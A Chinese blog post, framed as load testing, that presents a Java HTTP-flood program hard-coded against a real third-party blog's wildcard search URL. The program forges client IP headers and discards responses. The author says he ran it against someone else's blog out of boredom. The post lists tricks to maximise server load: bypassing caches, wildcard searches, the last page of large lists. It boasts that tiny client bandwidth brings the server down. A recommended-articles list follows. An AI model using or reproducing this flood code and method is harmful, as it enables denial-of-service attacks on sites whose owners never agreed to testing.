Java压测之四两拨千斤

Wesley13
• 阅读 549

何为压测,何为DDOS攻击、CC攻击,我想,百度会告诉你一切。

在做这件事情之前,我先贴上一份代码,如果你是测试工程师,或许这份代码对你有用。

package com.ezone.test.socket;

import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.URL;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;

public class PressureTest {

    public static void main(String[] args) throws Exception {
        httpFlush("http://www.songpeng.net/?s=*", 10, 5000, 100000);
    }

    /**
     * 发包方法
     * @urlString 目标网址
     * @thread 线程数
     * @connecttimeOut 连接超时时间
     * @timeMillisecond 压测时长
     */
    public static void httpFlush(String urlString, Integer thread, Integer connecttimeOut, long timeMillisecond)
            throws Exception {
        URL url = new URL(urlString);
        StringBuilder httpData = new StringBuilder();
        httpData.append("GET " + urlString + " HTTP/1.1\r\n");
        Integer port = url.getPort() == -1 ? 80 : url.getPort();
        String host = url.getHost() + ":" + port;
        httpData.append("Host: " + host + "\r\n");
        httpData.append("Accept: */*\r\n");
        String ip = getRandomIp();
        httpData.append("x-forwarded-for: " + ip);
        httpData.append("Proxy-Client-IP: " + ip);
        httpData.append("WL-Proxy-Client-IP: " + ip);
        httpData.append("Content-Type: application/x-www-form-urlencoded\r\n");
        httpData.append("\r\n");
        byte[] data = httpData.toString().getBytes("UTF-8");
        for (int i = 0; i < thread; i++) {
            sysThreadPool.execute(new Runnable() {
                @SuppressWarnings("resource")
                @Override
                public void run() {
                    while (true) {
                        try {
                            Socket socket = new Socket();
                            socket.connect(new InetSocketAddress(url.getHost(), port), connecttimeOut);
                            socket.setKeepAlive(true);
                            socket.getOutputStream().write(data);
                            socket.getOutputStream().flush();
                            socket = null;
                        } catch (Exception e) {
                            e.printStackTrace();
                        }
                    }
                }
            });
        }
        while (true) {
            Thread.sleep(5);
            System.gc();
        }
    }

    public static String getRandomIp() {

        return getRanDom(1, 254) + "." + getRanDom(1, 254) + "." + getRanDom(1, 254) + "." + getRanDom(1, 254);
    }

    public static Integer getRanDom(int start, int end) {
        return (int) (Math.random() * (end - start + 1)) + start;
    }

    public static final int CORESIZE_NORMAL = 200;// 线程数
    public static final int MAXCORESIZE = 200; // 最大线程数
    public static final int KEEPALIVETIME = 10; // 10s
    public static final ExecutorService sysThreadPool = new ThreadPoolExecutor(CORESIZE_NORMAL, MAXCORESIZE,
            KEEPALIVETIME, TimeUnit.SECONDS, new LinkedBlockingQueue<Runnable>());
}

为了避免这份代码被人恶意利用,以上不提供多余功能。仅仅提供一个GET的测试。

测试实例前言:在一个群里有一位大神发了一个博客,本人可能闲着无聊缺乏存在感,故此测试了一下

一般情况下来说,我们直接贴上一个非静态链接即可,但是为了达到四两拨千斤的效果可以这样子做。

1、该网站是否有缓存,如果有,那就添加动态参数

2、该网站是否有类似于模糊搜索,如果有,那就搜索*号之类的通配符或者涉及最广的关键字,让服务器负载大数据。

3、如果该网站有大数据列表,那就跳转到最后一页。压测这一页即可(需在无缓存情况下)

先来看看效果:

Java压测之四两拨千斤

效果:

Java压测之四两拨千斤

控制台的错误不用理会,本次测试仅采用十个线程。

十个线程伪概念:本次关于发包线程仅10个,关于连接数,可能几千个(具体原理请分析代码技巧)

压测之四两拨千斤核心观念:

1、传统的http请求肯定不能用于压测,原因是请求一次,响应一次,而响应数据同时占用了客户端的带宽,故此,客户端请求后,不需要接受响应,让服务器单相思去。

2、寻找可以令服务器产生内存或带宽(包括网络带宽/IO带宽等)负载的接口进行压测

综合以上种种情况,本次压测,仅消耗客户端10KB网速即可另服务器over。

                                                                                     By:Coody

点赞
收藏
评论区
推荐文章
待兔 待兔
3个月前
手写Java HashMap源码
HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22
Stella981 Stella981
3年前
Arthas watch 命令使用指南
作者|AgentdArthaswatch命令使用指南Arthas是我很喜欢的一款Java领域的开发调试工具。每次测试遇到问题的时候,当别人为了加一条日志而重发代码,我都会欣慰地拿出我的Arthas并且告诉他们:少年,你不用再为了加日志就重发代码而烦恼了。Arthas,你值得拥有。这次我
Wesley13 Wesley13
3年前
mysql压测实战
1、安装压测工具curlshttps://packagecloud.io/install/repositories/akopytov/sysbench/script.rpm.sh|sudobashyumyinstallsysbench2、执行压测命令sysbenchdb
Stella981 Stella981
3年前
OceanBase数据库实践入门——性能测试建议
概述本文主要分享针对想压测OceanBase时需要了解的一些技术原理。这些建议可以帮助用户对OceanBase做一些调优,再结合测试程序快速找到适合业务的最佳性能。由于OceanBase自身参数很多、部署形态也比较灵活,这里并没有给出具体步骤。数据库读写特点压测的本质就是对一个会话的逻辑设计很高的并发。首先需要了解单个会话在
Stella981 Stella981
3年前
Spring Boot 教程
1\.应用测试的介绍一般我们在写完代码之后,代码的测试是会给专门的测试人员来测试的,如果一个测试跑到你的工位上对你说,你的代码好像有Bug,你肯定会不爽,反正我就是这样的🙃。所以为了显示自己的代码质量高一点,在功能提交给测试之前,我们会自己测试一下,接下来给大家介绍一下SpringBootTest应用测试框架。Spr
Wesley13 Wesley13
3年前
Java面试系列01(Java类加载、双亲委托机制、Java优点)
决定写一系列这样的文章吧,这一类的文章并不会探究到Java的底层知识,这个系列的文章(虽然我之前的坑还没填完。。。不过还是想写一下)可能会和之前写过的文章一些知识重复,编程大神如果想回忆一下也可以看一看。小白的话,不建议看。因为我不会写的通俗易懂,大部分是已经被大多数人认同的定义,如果你对你的理解力很有自信,那本系列文章对你会很有用(其实,小
京东云开发者 京东云开发者
9个月前
大数据平台红蓝对抗 - 磨利刃,淬精兵!
背景目前大促备战常见备战工作:专项压测(全链路压测、内部压测)、灾备演练、降级演练、限流、巡检(监控、应用健康度)、混沌演练(红蓝对抗),如下图所示。随着平台业务越来越复杂,红蓝对抗的作用愈来愈明显,下面将详细介绍大数据平台在大促备战工作中是如何开展红蓝对
CGLIB动态代理对象GC问题排查 | 京东云技术团队
一、问题是怎么发现的最近有个新系统开发完成后要上线,由于系统调用量很大,所以先对核心接口进行了一次压力测试,由于核心接口中基本上只有纯内存运算,所以预估核心接口的压测QPS能够达到上千。压测容器配置:4C8G先从10个并发开始进行发压,结果cpu一下就飙升
Java应用堆外内存泄露问题排查 | 京东云技术团队
最近有个java应用在做压力测试,压测环境配置:CentOS系统4核CPU8g内存jdk1.6.0_25,jvm配置serverXms2048mXmx2048m,出现问题,本篇文章是对此次问题的回顾和复盘
京东云开发者 京东云开发者
11个月前
谈谈压测方案的那点事 | 京东物流技术团队
前言在现阶段大促备战的压测不算是一件新鲜事,已经不存在什么技术瓶颈或者资源问题,每个团队都有很多人能够执行性能测试,在一些团队也已经落地了日常常态化,但压测也没有简单到只在压测平台上设置参数、运行脚本,然后去看压测报告中某个指标是否满足压测目标那么简单,我